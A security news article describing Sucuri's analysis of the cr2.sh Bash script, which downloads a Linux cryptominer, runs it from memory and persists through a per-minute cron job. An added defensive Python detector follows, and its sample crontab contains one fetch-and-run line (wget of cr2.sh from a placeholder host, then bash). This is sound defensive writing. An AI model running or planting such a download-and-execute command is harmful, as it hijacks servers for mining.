Malicious Bash Script Downloads Cryptominer on Linux Hosts

Sucuri researchers have just reported that someone contacted them about "a malicious process they had discovered running on their web server". The process in question was quite heavy on the CPU, pointing to a cryptominer process running in the background.
During their analysis, the researchers were able to determine that the cryptominer was downloaded via a Bash script known as cr2.sh, which is dropped on the server in an unknown way.

What happens after the bash file is executed? It is set to kill processes from a list of process names related to cryptomining, such as xmrig and cryptonight, among others.

It then checks whether the malicious process is already running and sends a request to a PHP file hosted on a separate server. This file returns the IP address from which the actual cryptominer content run by the malicious process is fetched.

More about the cr2.sh bash script

The cr2.sh script also needs to determine whether the OS environment is 32- or 64-bit in order to download the matching cryptomining payload. To do this it uses the curl or wget command, saving the payload as /tmp/php, while the miner's configuration file is downloaded from the same server, the researchers explained.

The script has now downloaded to the web server all of the content needed to spawn the process using nohup, which allows the process to keep running regardless of whether the user ends their bash session.

In its next phase, the miner process, now loaded in the Linux host's memory, deletes the payload as well as its configuration file from disk. This is done to conceal its presence, since the miner keeps running from memory while the files that would reveal it are gone.

Related: Linux Subsystem in Windows 10 Makes It Vulnerable to Bashware

The malware is also capable of achieving persistence by creating a cron job that is set to run every minute. Moreover, it will check for the cr2.sh Bash script, and if the script is missing, it will re-download and execute it once again:

Just in case someone detects the process and kills it along with the initial cr2.sh file, the script creates a cron job (unless one exists already). This cron job is scheduled to run every minute, re-download the cr2.sh file if it is missing, and execute the malicious bash script.

Note that not only web servers are targeted by this attack but also desktop installations of 32/64-bit Linux systems, and other variants have been deployed to infect Windows installations.
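A defender-side check for the three behaviours described above (a per-minute cron job that re-fetches a shell script, a miner executing from /tmp, and a payload deleted from disk while its process lives on in memory), as an added example that is not part of the original article or of Sucuri's research. The crontab lines, the process records and the example.invalid URL are constructed sample input, and collect_procs is a hypothetical helper that builds the same records from a live /proc.

```python
import os, re

# Constructed crontab sample (not from the article); the second entry mirrors the
# per-minute re-download behaviour described for cr2.sh, with a placeholder URL.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * [ -f /tmp/cr2.sh ] || wget -q http://example.invalid/cr2.sh -O /tmp/cr2.sh; bash /tmp/cr2.sh
*/15 * * * * /opt/backup/run.sh
"""

# Constructed process records: (pid, target of /proc/<pid>/exe, cmdline).
# A miner that unlinked its own binary shows up as "<path> (deleted)".
SAMPLE_PROCS = [
    (812, "/usr/sbin/nginx", "nginx: worker process"),
    (4417, "/tmp/php (deleted)", "/tmp/php -c /tmp/config.json"),
    (4420, "/usr/bin/python3", "python3 app.py"),
]

FETCH_RE = re.compile(r"\b(curl|wget)\b")
SHELL_RE = re.compile(r"\b(bash|sh)\b")

def suspicious_cron_entries(crontab_text):
    """Return commands scheduled every minute that fetch and run a shell script."""
    hits = []
    for line in crontab_text.splitlines():
        fields = line.strip().split(None, 5)  # five schedule fields, then the command
        if len(fields) < 6 or fields[0].startswith("#"):
            continue
        schedule, command = fields[:5], fields[5]
        if schedule == ["*"] * 5 and FETCH_RE.search(command) and SHELL_RE.search(command):
            hits.append(command)
    return hits

def deleted_binary_processes(procs):
    # PIDs whose executable was removed from disk after the process started
    return [pid for pid, exe, _ in procs if exe.endswith(" (deleted)")]

def tmp_executables(procs):
    # PIDs executing from /tmp, deleted or not (e.g. the /tmp/php payload)
    return [pid for pid, exe, _ in procs if exe.startswith("/tmp/")]

def collect_procs():
    """Hypothetical helper: build the same records from a live /proc (root sees all PIDs)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:  # kernel threads, exited or unreadable processes
            continue
        procs.append((int(pid), exe, cmdline))
    return procs
```

On a real host, feed the output of `crontab -l` (for every user) and `collect_procs()` to the same three functions; a hit on all three is exactly the profile the article describes.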

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum for 4 years. Enjoys 'Mr. Robot' and fears '1984'. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim
